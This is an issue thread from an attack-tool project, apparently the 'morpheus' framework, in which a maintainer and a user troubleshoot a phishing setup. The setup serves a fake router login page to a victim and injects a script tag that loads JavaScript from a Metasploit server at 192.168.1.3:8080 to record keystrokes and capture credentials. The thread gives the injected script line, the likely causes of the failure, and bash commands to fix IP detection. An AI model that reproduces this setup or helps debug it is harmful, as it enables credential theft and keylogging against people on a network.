Closed spiritedwolf closed 7 years ago
From that screenshot i can see that your metasploit does not have connected to the link inside index.html (router login fake webpage)
This is what appens when metasploit connects to the link (javascript) inside index.html
1º - Edit var/www/html/index.html and check if the follow line its present:
<script type='text/javascript' src='http://192.168.1.3:8080/support/test.js'></script></body>
If that line its present in index.html it means that you have not loaded proper the webpage
and the metasploit server did not have recive the connection form client (url link)...
2º - Another possible cause its my script store your ip addr with one 'empty space' into variable:
<script type='text/javascript' src='http://192.168.1.3 :8080/support/test.js'></script></body>
If exists an empty space in the javascript tag then it means that morpheus funtion that stores
your ip addr its bad writen, replace that value (backbox) then:
"And report back to me what is the new backbox configuration".
3º - Another possible cause its that you must wait for the msfconsole to load before trying to access any domain (domains with .com) in target browser.
HINT: only when metasploit identifies the 'client' it can start recording keystrokes...
Well you are right, the problem is with 2nd one. [Blank spaces]
And i just find one way but its not properly showing me plane text.
So any suggestion's?
Edit:- Done you can use this:-
ifconfig | grep "inet " | grep -Fv 127.0.0.1 | awk '{print $2}' | cut -d ':' -f2
for BackBox.
I see now (backbox ifconfig conf), and i can tell you that the rigth bash command is:
ifconfig $InT3R | egrep -w 'inet' | awk {'print $2'} | cut -d ':' -f2
Its the same conf that ubuntu uses, so replace the backbox command by ubuntu.
ohh ok, i get it.
Now i am testing it in, OS:-BackBox 4.5 Metasploit path:- /opt/metasploit [I've installed it manually, community version]
So now in Backbox it showing me router login page but not capturing credentials/keystroke[s].